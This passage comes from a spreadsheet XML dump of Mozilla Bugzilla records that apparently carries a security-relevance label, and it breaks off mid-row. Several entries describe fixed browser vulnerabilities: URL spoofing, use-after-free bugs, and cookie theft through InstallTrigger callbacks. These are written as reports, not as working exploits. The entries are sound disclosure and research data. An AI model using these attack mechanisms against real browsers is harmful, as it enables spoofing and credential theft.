      </c>
      <c r="R5578" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5578" t="inlineStr">
        <is>
          <t>mozilla0.9.6</t>
        </is>
      </c>
      <c r="T5578" t="n">
        <v>1</v>
      </c>
      <c r="U5578" t="n">
        <v>0</v>
      </c>
      <c r="V5578" t="n">
        <v>29</v>
      </c>
      <c r="W5578" t="inlineStr">
        <is>
          <t>No crash happens if you enable autoconfig proxies for the current
profile via prefs via the pref dialog.  But if you enable it by
default by modifying all.js, it will crash the browser.
This may be important to enterprises.
Moved from bug 102958:
======================
2001-10-09 18:02:
With the standard Netscape build if I modify the all.js following two lines
pref("network.proxy.autoconfig_url",    "http://oasis.orst.edu:8080/proxy.pac");
pref("network.proxy.type",              2);
The browser will crash at startup.</t>
        </is>
      </c>
      <c r="X5578" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5579">
      <c r="A5579" t="n">
        <v>845640</v>
      </c>
      <c r="B5579" t="inlineStr">
        <is>
          <t>2013-02-26 19:07:30 -0800</t>
        </is>
      </c>
      <c r="C5579" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of SeaMonkey 2.17 Beta 2</t>
        </is>
      </c>
      <c r="D5579" t="inlineStr">
        <is>
          <t>2013-03-19 22:31:01 -0700</t>
        </is>
      </c>
      <c r="E5579" t="n">
        <v>1</v>
      </c>
      <c r="F5579" t="n">
        <v>1</v>
      </c>
      <c r="G5579" t="n">
        <v>2</v>
      </c>
      <c r="H5579" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5579" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J5579" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="K5579" t="inlineStr">
        <is>
          <t>SeaMonkey 2.17 Branch</t>
        </is>
      </c>
      <c r="L5579" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5579" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5579" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5579" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5579" t="inlineStr"/>
      <c r="Q5579" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5579" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S5579" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5579" t="n">
        <v>1</v>
      </c>
      <c r="U5579" t="n">
        <v>0</v>
      </c>
      <c r="V5579" t="n">
        <v>9</v>
      </c>
      <c r="W5579" t="inlineStr">
        <is>
          <t>This is a tracking bug for Build and Release of SeaMonkey 2.17 Beta 2
We expect an actual release on Friday 8th March.</t>
        </is>
      </c>
      <c r="X5579" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5580">
      <c r="A5580" t="n">
        <v>1216130</v>
      </c>
      <c r="B5580" t="inlineStr">
        <is>
          <t>2015-10-19 06:18:12 -0700</t>
        </is>
      </c>
      <c r="C5580" t="inlineStr">
        <is>
          <t>Simple var assignments can trigger "can't convert undefined to object" exception</t>
        </is>
      </c>
      <c r="D5580" t="inlineStr">
        <is>
          <t>2016-07-02 11:32:51 -0700</t>
        </is>
      </c>
      <c r="E5580" t="n">
        <v>1</v>
      </c>
      <c r="F5580" t="n">
        <v>1</v>
      </c>
      <c r="G5580" t="n">
        <v>3</v>
      </c>
      <c r="H5580" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5580" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5580" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5580" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L5580" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5580" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5580" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5580" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5580" t="inlineStr">
        <is>
          <t>[adv-main43+]</t>
        </is>
      </c>
      <c r="Q5580" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5580" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5580" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T5580" t="n">
        <v>1</v>
      </c>
      <c r="U5580" t="n">
        <v>1</v>
      </c>
      <c r="V5580" t="n">
        <v>43</v>
      </c>
      <c r="W5580" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0
Build ID: 20151015125802
Steps to reproduce:
With the change from Firefox 40.0.3 to 41.x (at least Linux/Windows), we're seeing issues where simple assignments are causing the mentioned exception. I was not able to extract a certain piece of code that is able to trigger the error, but maybe someone has a clue what changed between the mentioned versions in order to track it down.
Here's a code snipped from the qooxdoo framework (https://github.com/qooxdoo/qooxdoo/blob/master/framework/source/class/qx/data/SingleValueBinding.js#L152):
        // go through all property names
        for (var i = 0; i &lt; propertyNames.length; i++) {
          ...
        }
The same error triggers at random other places where no real error can be seen from within the debugger. i.E. same file: https://github.com/qooxdoo/qooxdoo/blob/master/framework/source/class/qx/data/SingleValueBinding.js#L141.
There's a ticket on qooxdoo side with information about it: http://bugzilla.qooxdoo.org/show_bug.cgi?id=9219
Some people seem to confirm that it is related to a problem with "Dynamic Script Execution Order", but I cannot confirm this on our side. It does not fix it.
Actual results:
Firefox stops when processing "var i = 0;" while the debugger column pointer points to the "i". An exception is launched claiming: "can't convert undefined to object".
propertyNames is a non sparse array with exactly one string element in position "0" in the case where it bails out. Its length is "1". While I can reproduce this one in 100% of all cases, I can't easily share the application, because it needs some backend data to run. If I can provide more information, please let me know.
Expected results:
The index i should be assigned with "0" and the loop should just run.</t>
        </is>
      </c>
      <c r="X5580" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5581">
      <c r="A5581" t="n">
        <v>489131</v>
      </c>
      <c r="B5581" t="inlineStr">
        <is>
          <t>2009-04-20 00:57:58 -0700</t>
        </is>
      </c>
      <c r="C5581" t="inlineStr">
        <is>
          <t>Arbitrary code execution using event listeners attached to an element whose owner document is null</t>
        </is>
      </c>
      <c r="D5581" t="inlineStr">
        <is>
          <t>2009-06-11 15:16:11 -0700</t>
        </is>
      </c>
      <c r="E5581" t="n">
        <v>1</v>
      </c>
      <c r="F5581" t="n">
        <v>1</v>
      </c>
      <c r="G5581" t="n">
        <v>3</v>
      </c>
      <c r="H5581" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5581" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5581" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5581" t="inlineStr">
        <is>
          <t>1.9.0 Branch</t>
        </is>
      </c>
      <c r="L5581" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5581" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5581" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5581" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5581" t="inlineStr">
        <is>
          <t>[sg:critical] fixed in 1.9.1 by 435656</t>
        </is>
      </c>
      <c r="Q5581" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5581" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5581" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5581" t="n">
        <v>1</v>
      </c>
      <c r="U5581" t="n">
        <v>0</v>
      </c>
      <c r="V5581" t="n">
        <v>12</v>
      </c>
      <c r="W5581" t="inlineStr">
        <is>
          <t>This is a variant of bug 383424.  fx3 and fx2 are affected.
The owner document of an element can become null after GC.  If the owner
document is null, nsCxPusher::Push() does not push a JS context, and thus event
listeners can be executed on the wrong JS context.  (On trunk, if the owner
document is null, nsCxPusher::Push() fails, and thus event listeners are not
executed.)</t>
        </is>
      </c>
      <c r="X5581" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5582">
      <c r="A5582" t="n">
        <v>1321619</v>
      </c>
      <c r="B5582" t="inlineStr">
        <is>
          <t>2016-12-01 11:29:13 -0800</t>
        </is>
      </c>
      <c r="C5582" t="inlineStr">
        <is>
          <t>URL bar spoof using drag and drop (dnd) and unicode-lookalike protocol to drag plaintext that "looks like" a valid URL</t>
        </is>
      </c>
      <c r="D5582" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:57 -0700</t>
        </is>
      </c>
      <c r="E5582" t="n">
        <v>1</v>
      </c>
      <c r="F5582" t="n">
        <v>1</v>
      </c>
      <c r="G5582" t="n">
        <v>2</v>
      </c>
      <c r="H5582" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5582" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5582" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K5582" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5582" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5582" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5582" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5582" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5582" t="inlineStr">
        <is>
          <t>[fxsearch][adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5582" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5582" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5582" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T5582" t="n">
        <v>1</v>
      </c>
      <c r="U5582" t="n">
        <v>0</v>
      </c>
      <c r="V5582" t="n">
        <v>31</v>
      </c>
      <c r="W5582" t="inlineStr">
        <is>
          <t>Created attachment 8816229
poc.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Steps to reproduce:
hey,
there's a url bar spoof vulnerability that occurs when a specially crafted url is dragged into the address bar.
Steps to reproduce:
1. Open poc.html(attached).
2. Drag and Drop the text in the page into the address bar.
3. notice that now is shown "https://www.google.com", even though the page hasn't been loaded.
cheers,
Mario.</t>
        </is>
      </c>
      <c r="X5582" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5583">
      <c r="A5583" t="n">
        <v>435675</v>
      </c>
      <c r="B5583" t="inlineStr">
        <is>
          <t>2008-05-25 12:04:01 -0700</t>
        </is>
      </c>
      <c r="C5583" t="inlineStr">
        <is>
          <t>The changelog on bugzilla.org needs a new column for the 3.2 branch</t>
        </is>
      </c>
      <c r="D5583" t="inlineStr">
        <is>
          <t>2008-08-12 06:43:42 -0700</t>
        </is>
      </c>
      <c r="E5583" t="n">
        <v>1</v>
      </c>
      <c r="F5583" t="n">
        <v>1</v>
      </c>
      <c r="G5583" t="n">
        <v>4</v>
      </c>
      <c r="H5583" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5583" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5583" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K5583" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5583" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5583" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5583" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5583" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5583" t="inlineStr"/>
      <c r="Q5583" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5583" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5583" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5583" t="n">
        <v>1</v>
      </c>
      <c r="U5583" t="n">
        <v>0</v>
      </c>
      <c r="V5583" t="n">
        <v>2</v>
      </c>
      <c r="W5583" t="inlineStr">
        <is>
          <t>http://www.bugzilla.org/status/changes.html needs to be updated to include the 3.2 branch. I know no other way to track checkins on branches, so I need it asap. :)</t>
        </is>
      </c>
      <c r="X5583" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5584">
      <c r="A5584" t="n">
        <v>724433</v>
      </c>
      <c r="B5584" t="inlineStr">
        <is>
          <t>2012-02-05 15:18:24 -0800</t>
        </is>
      </c>
      <c r="C5584" t="inlineStr">
        <is>
          <t>"empty" SDK add-on creates zombie compartments in SDK 1.4.2</t>
        </is>
      </c>
      <c r="D5584" t="inlineStr">
        <is>
          <t>2012-04-17 08:18:11 -0700</t>
        </is>
      </c>
      <c r="E5584" t="n">
        <v>1</v>
      </c>
      <c r="F5584" t="n">
        <v>1</v>
      </c>
      <c r="G5584" t="n">
        <v>6</v>
      </c>
      <c r="H5584" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5584" t="inlineStr">
        <is>
          <t>Add-on SDK Graveyard</t>
        </is>
      </c>
      <c r="J5584" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5584" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5584" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5584" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5584" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5584" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5584" t="inlineStr">
        <is>
          <t>[MemShrink:P2]</t>
        </is>
      </c>
      <c r="Q5584" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5584" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5584" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5584" t="n">
        <v>1</v>
      </c>
      <c r="U5584" t="n">
        <v>1</v>
      </c>
      <c r="V5584" t="n">
        <v>11</v>
      </c>
      <c r="W5584" t="inlineStr">
        <is>
          <t>STR:
- Create a new add-on with the following main.js (and nothing else):
require("panel");
- cfx xpi
- Install xpi in a fresh profile
- Disable add-on again
- Go about:memory?verbose
- Minimize memory usage
- Wait a couple of minutes, just to be sure
- Minimize memory usage
-&gt; Observe that all the jetpack compartments are still present
Tested and affected SDK version: 1.4.2
Tested and NOT affected SDK version: 1.3
Tested with the latest Nightly Win64 and official Firefox 10 Win32
Might be related to bug 724404</t>
        </is>
      </c>
      <c r="X5584" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5585">
      <c r="A5585" t="n">
        <v>575294</v>
      </c>
      <c r="B5585" t="inlineStr">
        <is>
          <t>2010-06-28 09:41:12 -0700</t>
        </is>
      </c>
      <c r="C5585" t="inlineStr">
        <is>
          <t>Navigation away from a page with an active &lt;select&gt; dropdown menu can be used for URL spoofing, other evil</t>
        </is>
      </c>
      <c r="D5585" t="inlineStr">
        <is>
          <t>2017-06-14 02:33:57 -0700</t>
        </is>
      </c>
      <c r="E5585" t="n">
        <v>1</v>
      </c>
      <c r="F5585" t="n">
        <v>1</v>
      </c>
      <c r="G5585" t="n">
        <v>3</v>
      </c>
      <c r="H5585" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5585" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5585" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K5585" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5585" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5585" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5585" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5585" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5585" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+] cross-browser issue (Chrome, Opera?)</t>
        </is>
      </c>
      <c r="Q5585" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5585" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5585" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T5585" t="n">
        <v>1</v>
      </c>
      <c r="U5585" t="n">
        <v>0</v>
      </c>
      <c r="V5585" t="n">
        <v>146</v>
      </c>
      <c r="W5585" t="inlineStr">
        <is>
          <t>User-Agent:       Opera/9.80 (X11; Linux x86_64; U; en) Presto/2.6.30 Version/10.60
Build Identifier: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3
Firefox shows the dropdown menu for &lt;select&gt; elements as an always-on-top chromeless window. It also allows arbitrary HTML content to be rendered in the &lt;option&gt; elements within the &lt;select&gt;.
Navigating away from a page with an active &lt;select&gt; menu does not remove the chromeless window containing the menu from view. By opening another menu programatically (using XUL, in my proof-of-concept page), it is possible to make the &lt;select&gt; menu persist through mouse interactions with the browser. By using absolute positioning/scrolling, an attacker can essentially cover arbitrary portions of a user's display with whatever they want.
I think the correct fix here would probably be to automatically dismiss &lt;select&gt; menus when navigating away from pages.
Reproducible: Always</t>
        </is>
      </c>
      <c r="X5585" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5586">
      <c r="A5586" t="n">
        <v>445229</v>
      </c>
      <c r="B5586" t="inlineStr">
        <is>
          <t>2008-07-14 15:01:23 -0700</t>
        </is>
      </c>
      <c r="C5586" t="inlineStr">
        <is>
          <t>NPAPI/NPruntime possible crash when returning a new NPObject as the result of an Invoke/InvokeDefault/GetProperty.</t>
        </is>
      </c>
      <c r="D5586" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E5586" t="n">
        <v>1</v>
      </c>
      <c r="F5586" t="n">
        <v>1</v>
      </c>
      <c r="G5586" t="n">
        <v>6</v>
      </c>
      <c r="H5586" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5586" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5586" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K5586" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5586" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5586" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5586" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5586" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5586" t="inlineStr">
        <is>
          <t>[sg:high?]</t>
        </is>
      </c>
      <c r="Q5586" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5586" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5586" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5586" t="n">
        <v>1</v>
      </c>
      <c r="U5586" t="n">
        <v>1</v>
      </c>
      <c r="V5586" t="n">
        <v>22</v>
      </c>
      <c r="W5586" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008062306 Firefox/2.0.0.15
From modules/plugin/base/src/nsJSNPRuntime.cpp:1297, in the nsNPObjWrapper::GetNewOrUsed function:
---------------------------------------------------------------------
  NPObjWrapperHashEntry *entry =
    NS_STATIC_CAST(NPObjWrapperHashEntry *,
                   PL_DHashTableOperate(&amp;sNPObjWrappers, npobj,
                                        PL_DHASH_ADD));
  if (!entry) {
    // Out of memory
    JS_ReportOutOfMemory(cx);
    return nsnull;
  }
  if (PL_DHASH_ENTRY_IS_BUSY(entry) &amp;&amp; entry-&gt;mJSObj) {
    // Found a live NPObject wrapper, return it.
    return entry-&gt;mJSObj;
  }
  entry-&gt;mNPObj = npobj;
  entry-&gt;mNpp = npp;
  // No existing JSObject, create one.
  JSObject *obj = ::JS_NewObject(cx, &amp;sNPObjectJSWrapperClass, nsnull, nsnull);
  if (!obj) {
    // OOM? Remove the stale entry from the hash.
    PL_DHashTableRawRemove(&amp;sNPObjWrappers, entry);
    return nsnull;
  }
  OnWrapperCreated();
  entry-&gt;mJSObj = obj;
---------------------------------------------------------------------
The 'entry' variable is a pointer to an entry inside the data storage of the global 'sNPObjWrappers' hash table. The problem is that the ::JS_NewObject (line 1318) may trigger a JavaScript garbage collection, that can in turn finalize some NPObject, removing them from the 'sNPObjWrappers' hash table. That process can re-allocate the storage of the hash table, making the 'entry' point to released memory, crashing the process when accessed in the line 1330 (or worse, pointing to re-allocated memory, hence corrupting data).
This bug was reproduced fairly reliably on Firefox 2.0.0.15. That code snippet looks similar in Firefox 3, suggesting the bug is probably still present (unless ::JS_NewObject can't trigger the JavaScript garbage collector).
I don't have a repro test case sample plug-in available currently, but I can probably write one if necessary. It is not clear if specific allocation/garbage collection patterns make this bug easier to reproduce.
Reproducible: Sometimes
Steps to Reproduce:
1. Write a NPAPI plug-in that has a function that creates and returns a new NPObject every time it is called.
2. Call that function many times from JavaScript.
Actual Results:  
Eventually Firefox will crash.
Expected Results:  
No crash</t>
        </is>
      </c>
      <c r="X5586" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5587">
      <c r="A5587" t="n">
        <v>1353476</v>
      </c>
      <c r="B5587" t="inlineStr">
        <is>
          <t>2017-04-04 11:18:07 -0700</t>
        </is>
      </c>
      <c r="C5587" t="inlineStr">
        <is>
          <t>Crash in mozilla::camera::CamerasParent::IsShuttingDown</t>
        </is>
      </c>
      <c r="D5587" t="inlineStr">
        <is>
          <t>2017-10-26 19:13:14 -0700</t>
        </is>
      </c>
      <c r="E5587" t="n">
        <v>1</v>
      </c>
      <c r="F5587" t="n">
        <v>1</v>
      </c>
      <c r="G5587" t="n">
        <v>3</v>
      </c>
      <c r="H5587" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5587" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5587" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K5587" t="inlineStr">
        <is>
          <t>49 Branch</t>
        </is>
      </c>
      <c r="L5587" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5587" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5587" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5587" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5587" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q5587" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5587" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5587" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5587" t="n">
        <v>1</v>
      </c>
      <c r="U5587" t="n">
        <v>0</v>
      </c>
      <c r="V5587" t="n">
        <v>15</v>
      </c>
      <c r="W5587" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-4319cf83-b45c-4115-b42d-f60ef2170403.
=============================================================
Stack isn't clear due to lambdas, but almost certainly this is the one NewRunnableFrom() which uses [this instead of [self (and thus doesn't hold a ref to the object).
Obvious safe fix, which hopefully fixes the problem.</t>
        </is>
      </c>
      <c r="X5587" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5588">
      <c r="A5588" t="n">
        <v>293331</v>
      </c>
      <c r="B5588" t="inlineStr">
        <is>
          <t>2005-05-08 01:09:57 -0700</t>
        </is>
      </c>
      <c r="C5588" t="inlineStr">
        <is>
          <t>InstallTrigger may run callback on a different page than the page that triggered the install.</t>
        </is>
      </c>
      <c r="D5588" t="inlineStr">
        <is>
          <t>2015-12-11 07:21:56 -0800</t>
        </is>
      </c>
      <c r="E5588" t="n">
        <v>1</v>
      </c>
      <c r="F5588" t="n">
        <v>1</v>
      </c>
      <c r="G5588" t="n">
        <v>6</v>
      </c>
      <c r="H5588" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5588" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5588" t="inlineStr">
        <is>
          <t>Installer: XPInstall Engine</t>
        </is>
      </c>
      <c r="K5588" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5588" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5588" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5588" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5588" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5588" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q5588" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5588" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5588" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5588" t="n">
        <v>1</v>
      </c>
      <c r="U5588" t="n">
        <v>0</v>
      </c>
      <c r="V5588" t="n">
        <v>22</v>
      </c>
      <c r="W5588" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Gecko/20050416 Fedora/1.0.3-1.3.1 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Gecko/20050416 Fedora/1.0.3-1.3.1 Firefox/1.0.3
My report to security@mozilla.org:
An attacker may force a script installation to happen, then change the page
behind the scenes so that the callback occurs in the domain of any random page.
 Note that this happens whether the user clicks "ok" or "cancel" on the XPI
install dialog.  This can be used to steal cookies, passwords, submit
information to another site, etc.  The sample exploit provides the users
bugzilla cookie in a dialog, but could easily submit it to another site. 
See attached testcase.  Note that testcase should be run on a different server,
since it steals cookies from bugzilla.
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X5588" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5589">
      <c r="A5589" t="n">
        <v>776213</v>
      </c>
      <c r="B5589" t="inlineStr">
        <is>
          <t>2012-07-20 22:23:12 -0700</t>
        </is>
      </c>
      <c r="C5589" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsHTMLSelectElement::SubmitNamesValues</t>
        </is>
      </c>
      <c r="D5589" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:55 -0700</t>
        </is>
      </c>
      <c r="E5589" t="n">
        <v>1</v>
      </c>
      <c r="F5589" t="n">
        <v>1</v>
      </c>
      <c r="G5589" t="n">
        <v>3</v>
      </c>
      <c r="H5589" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5589" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5589" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5589" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5589" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5589" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5589" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5589" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5589" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q5589" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5589" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5589" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T5589" t="n">
        <v>1</v>
      </c>
      <c r="U5589" t="n">
        <v>0</v>
      </c>
      <c r="V5589" t="n">
        <v>23</v>
      </c>
      <c r="W5589" t="inlineStr">
        <is>
          <t>Reproduces on trunk. Repro reproduced once (but got it under a fully symbolized build). As i have a better testcase, I will add it here. 
=================================================================
